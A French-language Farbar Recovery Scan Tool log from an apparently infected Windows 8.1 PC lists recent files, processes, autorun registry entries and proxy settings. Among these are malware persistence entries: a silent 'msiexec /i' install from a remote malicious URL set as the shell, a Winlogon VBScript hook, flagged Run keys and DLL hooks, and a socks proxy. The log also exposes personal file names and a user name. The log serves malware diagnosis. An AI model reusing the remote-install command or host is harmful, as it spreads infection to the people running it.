2018-07-19 14:36 - 2018-04-26 14:43 - 000065880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-private-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000021848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-math-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000018776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-multibyte-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000017240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-string-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000017240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-stdio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000015704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-runtime-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000015192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-convert-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000013656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-time-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000013152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-filesystem-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000012120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-process-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000012120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-conio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-utility-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-locale-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-heap-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:43 - 000011608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-crt-environment-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000998912 _____ (Microsoft Corporation) C:\Windows\system32\ucrtbase.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000063832 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-private-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000020824 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-math-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000019288 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-multibyte-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000017752 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-string-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000017752 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-stdio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000016216 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-runtime-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000015704 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-convert-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000014168 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-time-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000013656 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-filesystem-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012640 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-conio-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012632 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-process-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-utility-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-locale-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-heap-l1-1-0.dll
2018-07-19 14:36 - 2018-04-26 14:19 - 000012120 _____ (Microsoft Corporation) C:\Windows\system32\api-ms-win-crt-environment-l1-1-0.dll
2018-07-19 14:36 - 2018-04-25 18:38 - 000243200 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2018-07-18 15:02 - 2018-07-18 15:02 - 005208782 _____ C:\Users\pc1\Downloads\guide-2018-bat-final.pdf
2018-07-18 14:46 - 2018-07-18 14:46 - 000280947 _____ C:\Users\pc1\Downloads\Liste des membres du Conseil-2016-2021_27_13.07.18.pdf
2018-07-18 14:30 - 2018-07-18 14:30 - 003836419 _____ C:\Users\pc1\Downloads\VEIGY+-+ECHO_188.pdf
2018-07-17 20:42 - 2018-07-17 20:42 - 008168015 _____ C:\Users\pc1\Downloads\guideville+2017.pdf
2018-07-17 20:40 - 2018-03-27 00:24 - 000029352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aspnet_counters.dll
2018-07-17 20:40 - 2018-03-27 00:24 - 000019088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr100_clr0400.dll
2018-07-17 20:40 - 2018-03-27 00:17 - 000030888 _____ (Microsoft Corporation) C:\Windows\system32\aspnet_counters.dll
2018-07-17 20:40 - 2018-03-27 00:17 - 000019088 _____ (Microsoft Corporation) C:\Windows\system32\msvcr100_clr0400.dll
2018-07-16 12:08 - 2018-07-16 12:10 - 020994333 _____ C:\Users\pc1\Downloads\sup Mut 2018 (2).pdf
2018-07-16 12:03 - 2018-07-16 12:03 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (2).pdf
2018-07-15 20:34 - 2018-06-12 20:01 - 000149632 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2018-07-15 20:34 - 2018-06-08 14:15 - 002860032 _____ (Microsoft Corporation) C:\Windows\system32\aitstatic.exe
2018-07-15 20:34 - 2018-06-08 14:15 - 001602048 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000783872 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000680960 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000612352 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000470016 _____ (Microsoft Corporation) C:\Windows\system32\centel.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000443392 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000301056 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2018-07-15 20:34 - 2018-06-08 14:15 - 000246272 _____ (Microsoft Corporation) C:\Windows\system32\aepic.dll
2018-07-13 19:31 - 2018-07-13 19:31 - 000004477 _____ C:\Users\pc1\Downloads\LoaderExportV3 (1).swf
2018-07-13 19:23 - 2018-07-13 19:23 - 000004477 _____ C:\Users\pc1\Downloads\LoaderExportV3.swf
2018-07-13 19:18 - 2018-07-13 19:18 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst (1).pdf
2018-07-13 19:17 - 2018-07-13 19:17 - 001412436 _____ C:\Users\pc1\Downloads\organisme-habilite-sst.pdf
2018-07-12 11:56 - 2018-07-12 11:56 - 008239366 _____ C:\Users\pc1\Downloads\05 Renoult PA. Nouvelles utilisations du systeme information médical des forces. Médecine et Armées 2017-2-129-36.pdf
2018-07-10 09:27 - 2018-07-10 09:27 - 000000165 ____H C:\Users\pc1\Documents\~$Rapport Maggi 2016.pptx
2018-07-09 22:16 - 2018-07-09 22:16 - 000319809 _____ C:\Users\pc1\Downloads\CURRICULUM VITAE DIANE ASTRIDE K. -ASSISTANTE BUSINESS DEVELOPER.pdf
2018-07-09 22:16 - 2018-07-09 22:16 - 000109149 _____ C:\Users\pc1\Downloads\Lettre de motivation Diane K. Business Developer.pdf
2018-07-09 18:12 - 2018-07-09 18:12 - 000285120 _____ C:\Users\pc1\Downloads\facture orange (1).pdf
2018-07-09 18:12 - 2018-07-09 18:12 - 000280488 _____ C:\Users\pc1\Downloads\permi raf.pdf
2018-07-09 18:04 - 2018-07-09 18:05 - 000259990 _____ C:\Users\pc1\Downloads\ci raf.pdf
2018-07-07 23:33 - 2018-07-07 23:33 - 000738961 _____ C:\Users\pc1\Downloads\20171017210857.pdf
2018-07-03 12:42 - 2018-07-03 12:44 - 020994333 _____ C:\Users\pc1\Downloads\sup Mut 2018 (1).pdf
2018-07-03 00:07 - 2018-07-03 00:07 - 000438996 _____ C:\Users\pc1\Downloads\organisme-habilite-aps-asd.pdf
2018-07-02 23:43 - 2018-07-02 23:43 - 003016173 _____ C:\Users\pc1\Downloads\BO n° 281 (avril 2018).pdf
==================== Un mois - Modifiés - fichiers et dossiers ========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2018-07-26 23:16 - 2017-02-02 20:53 - 000000000 ____D C:\Program Files\Opera
2018-07-26 23:12 - 2017-05-22 19:30 - 000000000 ____D C:\Users\pc1\Documents\Youcam
2018-07-26 23:12 - 2017-02-20 15:38 - 000000000 _____ C:\Users\Public\Documents\temp.dat
2018-07-26 23:09 - 2013-08-22 15:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-07-26 23:04 - 2015-05-27 17:42 - 000000000 ____D C:\Users\pc1
2018-07-26 22:59 - 2015-08-27 19:22 - 000000000 ____D C:\Users\pc1\AppData\Local\ClassicShell
2018-07-26 22:54 - 2017-05-04 11:18 - 000000000 ____D C:\Users\pc1\AppData\Local\background_fault
2018-07-26 21:26 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\system32\NDF
2018-07-26 19:19 - 2017-03-26 22:26 - 000003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-813913080-1538114768-4122880109-1001
2018-07-26 18:01 - 2015-05-27 17:43 - 000000000 ____D C:\Users\pc1\AppData\Roaming\Adobe
2018-07-26 16:19 - 2016-01-24 23:39 - 000000000 ____D C:\Windows\system32\MRT
2018-07-26 15:59 - 2016-01-24 23:39 - 134675576 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2018-07-26 15:31 - 2018-01-03 22:13 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2018-07-26 15:31 - 2015-09-10 12:52 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-07-26 08:04 - 2015-11-10 18:13 - 000000000 ____D C:\Users\pc1\AppData\Roaming\vlc
2018-07-25 20:10 - 2016-01-21 11:05 - 000000000 ____D C:\Users\pc1\AppData\Roaming\VIP72 Socks Client
2018-07-25 20:09 - 2016-01-17 17:42 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-07-23 19:17 - 2018-03-28 23:45 - 000000000 ____D C:\Users\pc1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Matisoft
2018-07-23 16:42 - 2015-05-27 17:42 - 000000000 ____D C:\Users\pc1\AppData\Local\Packages
2018-07-22 19:24 - 2017-06-02 20:29 - 000000000 ____D C:\Windows\CbsTemp
2018-07-20 20:57 - 2013-08-22 14:36 - 000000000 ____D C:\Windows\Inf
2018-07-19 23:21 - 2013-08-22 15:44 - 005374488 _____ C:\Windows\system32\FNTCACHE.DAT
2018-07-19 23:12 - 2013-08-22 16:36 - 000000000 ___RD C:\Windows\ToastData
2018-07-19 13:55 - 2018-05-09 19:53 - 000685568 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2018-07-18 20:15 - 2018-05-25 03:57 - 005130519 _____ C:\Users\pc1\Downloads\video.mp4
2018-07-18 12:23 - 2016-01-25 01:54 - 000000000 ____D C:\Windows\system32\appraiser
2018-07-16 23:02 - 2015-09-10 12:20 - 000563832 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2018-07-11 22:46 - 2018-05-26 08:38 - 000000000 ____D C:\Users\pc1\Documents\Fichiers Outlook
2018-07-10 09:15 - 2016-07-07 09:33 - 000000000 ____D C:\Users\pc1\Documents\fan DANGO-FANXTRA
2018-07-06 11:51 - 2013-08-22 16:36 - 000000000 ____D C:\Windows\tracing
2018-07-02 18:11 - 2017-05-03 22:36 - 000000000 ____D C:\Users\pc1\AppData\Roaming\WhatsApp
2018-07-01 12:25 - 2017-04-20 18:09 - 000000000 ____D C:\Users\pc1\Downloads\son
2018-06-28 23:07 - 2018-03-21 09:45 - 000835064 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2018-06-28 23:07 - 2018-03-21 09:45 - 000179704 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
==================== Fichiers à la racine de certains dossiers =======
2017-02-20 21:10 - 2017-05-02 09:35 - 000057444 _____ () C:\Program Files (x86)\metadata
2017-02-20 21:10 - 2017-05-02 09:06 - 000000040 _____ () C:\Program Files (x86)\settings.dat
2017-02-26 11:15 - 2017-02-26 11:15 - 000000000 _____ () C:\Users\pc1\AppData\Roaming\agent.dat
2017-02-26 11:15 - 2017-02-26 11:15 - 001132960 _____ () C:\Users\pc1\AppData\Roaming\Damsantex.tst
2017-05-31 13:46 - 2017-05-31 13:46 - 000000049 ____H () C:\Users\pc1\AppData\Roaming\eMail Verifier.ini
2017-05-19 11:32 - 2017-06-02 13:36 - 000003475 _____ () C:\Users\pc1\AppData\Roaming\go00001.bak
2017-02-26 11:12 - 2017-02-26 11:13 - 000015696 _____ () C:\Users\pc1\AppData\Roaming\InstallationConfiguration.xml
2017-02-26 11:12 - 2017-02-26 11:12 - 000140288 _____ () C:\Users\pc1\AppData\Roaming\Installer.dat
2017-06-02 15:43 - 2017-06-02 15:43 - 000000049 ____H () C:\Users\pc1\AppData\Roaming\MaxBulk registration.ini
2016-04-03 17:57 - 2017-05-08 15:21 - 000000132 _____ () C:\Users\pc1\AppData\Roaming\Préfs Filtre IllExportation Adobe CS6
2018-07-20 00:27 - 2018-07-20 00:27 - 000000132 _____ () C:\Users\pc1\AppData\Roaming\Préfs Format PNG Adobe CS6
2016-06-29 08:33 - 2018-01-25 15:08 - 000005632 _____ () C:\Users\pc1\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-10-12 11:36 - 2015-10-12 11:36 - 000000000 _____ () C:\Users\pc1\AppData\Local\{B1C33B2F-8FDC-408C-8438-0EEEDBBF18F3}
Fichiers à déplacer ou supprimer:
====================
C:\Users\pc1\AppData\Roaming\gplyra\gplyra.exe
C:\Users\pc1\AppData\Local\background_fault\aswRD.exe
Certains fichiers dans TEMP:
====================
2017-11-28 18:37 - 2017-11-28 18:37 - 000009728 _____ () C:\Users\pc1\AppData\Local\Temp\bassmod.dll
2017-07-13 20:50 - 2017-07-13 21:01 - 058740704 _____ (Skype Technologies S.A.) C:\Users\pc1\AppData\Local\Temp\SkypeSetup.exe
2017-09-15 17:21 - 2017-09-15 17:30 - 030950664 _____ () C:\Users\pc1\AppData\Local\Temp\vlc-2.2.6-win32.exe
==================== Bamital & volsnap ======================
(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)
C:\Windows\system32\winlogon.exe => Le fichier est signé numériquement
C:\Windows\system32\wininit.exe => Le fichier est signé numériquement
C:\Windows\explorer.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\explorer.exe => Le fichier est signé numériquement
C:\Windows\system32\svchost.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\svchost.exe => Le fichier est signé numériquement
C:\Windows\system32\services.exe => Le fichier est signé numériquement
C:\Windows\system32\User32.dll => Le fichier est signé numériquement
C:\Windows\SysWOW64\User32.dll => Le fichier est signé numériquement
C:\Windows\system32\userinit.exe => Le fichier est signé numériquement
C:\Windows\SysWOW64\userinit.exe => Le fichier est signé numériquement
C:\Windows\system32\rpcss.dll => Le fichier est signé numériquement
C:\Windows\system32\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\SysWOW64\dnsapi.dll => Le fichier est signé numériquement
C:\Windows\system32\Drivers\volsnap.sys => Le fichier est signé numériquement
LastRegBack: 2018-07-26 15:55
==================== Fin de FRST.txt ============================
Exécuté par Diane.K (administrateur) sur PC (26-07-2018 23:50:56)
Exécuté depuis C:\Users\pc1\Desktop
Profils chargés: Diane.K (Profils disponibles: Diane.K)
Platform: Windows 8.1 (Update) (X64) Langue: Français (France)
Internet Explorer Version 11 (Navigateur par défaut: "C:\Program Files (x86)\Bookness\Application\chrome.exe" "%1")
Mode d'amorçage: Normal
Tutoriel pour Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processus (Avec liste blanche) =================
(Si un élément est inclus dans le fichier fixlist.txt, le processus sera arrêté. Le fichier ne sera pas déplacé.)
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
() C:\Program Files (x86)\Explorer\iedvutils.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\Program Files (x86)\Realtek\REALTEK Bluetooth\BTDevMgr.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
(Intel(R) Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe
() C:\ProgramData\MobileBrServ\mbbService.exe
() C:\ProgramData\MTN Online\OnlineUpdate\ouc.exe
() C:\Program Files\CyberLink\Shared files\RichVideo64.exe
(SplitCam Co.) C:\Program Files (x86)\SplitCam\SplitCamService.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(DEVGURU Co., LTD.) C:\Program Files\SAMSUNG\USB Drivers\25_escape\conn\ss_conn_service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(TorchMedia Inc.) C:\Users\pc1\AppData\Local\Torch\Update\TorchCrashHandler.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.17\GoogleCrashHandler64.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
() C:\Program Files (x86)\No-IP\ducservice.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Farbar) C:\Users\pc1\Desktop\farbar-recovery-scan-tool-64-bits_19-07-2018_fr_432987_64.exe
==================== Registre (Avec liste blanche) ===========================
(Si un élément est inclus dans le fichier fixlist.txt, l'élément de Registre sera restauré à la valeur par défaut ou supprimé. Le fichier ne sera pas déplacé.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7636696 2014-09-03] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1396592 2014-09-02] (Realtek Semiconductor)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2014-09-17] (Synaptics Incorporated)
HKLM\...\Run: [Classic Start Menu] => C:\Program Files\Classic Shell\ClassicStartMenu.exe [161728 2015-08-09] (IvoSoft)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [446392 2012-04-04] (Adobe Systems Incorporated)
HKLM\...\Run: [gplyra] => C:\Users\pc1\AppData\Roaming\gplyra\gplyra.exe [1541120 2017-02-25] () <==== ATTENTION
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [303928 2017-05-09] (Apple Inc.)
HKLM-x32\...\Run: [PWRISOVM.EXE] => C:\Program Files (x86)\PowerISO\PWRISOVM.EXE [312376 2011-11-15] (Power Software Ltd)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 8.0\Acrobat\Acrotray.exe [624248 2007-05-10] (Adobe Systems Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs,
HKLM-x32\...\Winlogon: [Userinit] wscript C:\Windows\run.vbs,
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Windscribe] => C:\Program Files (x86)\Windscribe\Windscribe.exe
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [background_fault] => C:\Users\pc1\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [50097088 2018-04-09] (Skype Technologies S.A.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [CyberGhost] => C:\Program Files\CyberGhost 6\CyberGhost.exe [1248848 2017-08-31] (CyberGhost S.A.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [ultracopier] => C:\Program Files (x86)\Ultracopier\ultracopier.exe [1200640 2016-01-02] (ultracopier.first-world.info)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [Chromium] => c:\users\pc1\appdata\local\chromium\application\chrome.exe [829440 2017-02-15] (The Chromium Authors)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [GoogleChromeAutoLaunch_622FDC5463774A77AFAA15FA9986B0E8] => C:\Program Files (x86)\Fanlook\Application\chrome.exe [976216 2017-05-09] (Google Inc.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Run: [GoogleChromeAutoLaunch_2618C502D38230C292A5E9A82228B6CF] => C:\Program Files (x86)\Standuck\Application\chrome.exe [945496 2017-02-01] (Google Inc.)
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1QOWYyRjNYOYU8MUI4M8I5OTNYFUUyOUJSFjI4FdEdRF== /q <==== ATTENTION
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {0965f634-1840-11e6-82a4-d260c8b66546} - "F:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {48766fca-175a-11e5-8265-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {534d2c4f-19f6-11e5-8267-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {55344e8a-eb00-11e6-82c2-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {6d4ddff3-c023-11e5-828c-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {b14a5c19-f83b-11e5-829f-2c337a8bf3d0} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL F:\index.html
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {b14a72bc-f83b-11e5-829f-2c337a8bf3d0} - "H:\TL-Bootstrap.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {ea1be95e-c083-11e5-828e-d260c8b66546} - "G:\LG_PC_Programs.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2dda7bd-0d77-11e5-8261-2c337a8bf3d0} - "G:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2ddacce-0d77-11e5-8261-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f2ddad47-0d77-11e5-8261-2c337a8bf3d0} - "F:\AutoRun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f959f036-cdee-11e5-8297-d260c8b66546} - "F:\autorun.exe"
HKU\S-1-5-21-813913080-1538114768-4122880109-1001\...\MountPoints2: {f959f073-cdee-11e5-8297-d260c8b66546} - "F:\autorun.exe"
HKLM\...\Providers\h9kafbc6: C:\Program Files (x86)\Juqgehuwuk Cache\local64spl.dll <==== ATTENTION
ShellExecuteHooks: Pas de nom - {7FBEA058-DE40-11E6-83E9-64006A5CFC23} - C:\Users\pc1\AppData\Roaming\Kowelystzother\Shuquty.dll [149504 2017-01-27] () <==== ATTENTION
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
ProxyServer: [S-1-5-21-813913080-1538114768-4122880109-1001] => socks=78.52.139.219:16749
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
